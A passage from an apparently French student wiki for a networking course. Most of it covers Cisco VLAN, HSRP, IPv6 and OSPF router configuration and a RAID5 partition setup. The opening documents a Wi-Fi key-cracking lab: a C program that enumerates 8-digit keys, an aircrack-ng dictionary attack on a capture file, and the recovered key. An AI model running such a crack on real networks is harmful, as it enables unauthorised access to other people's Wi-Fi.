On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
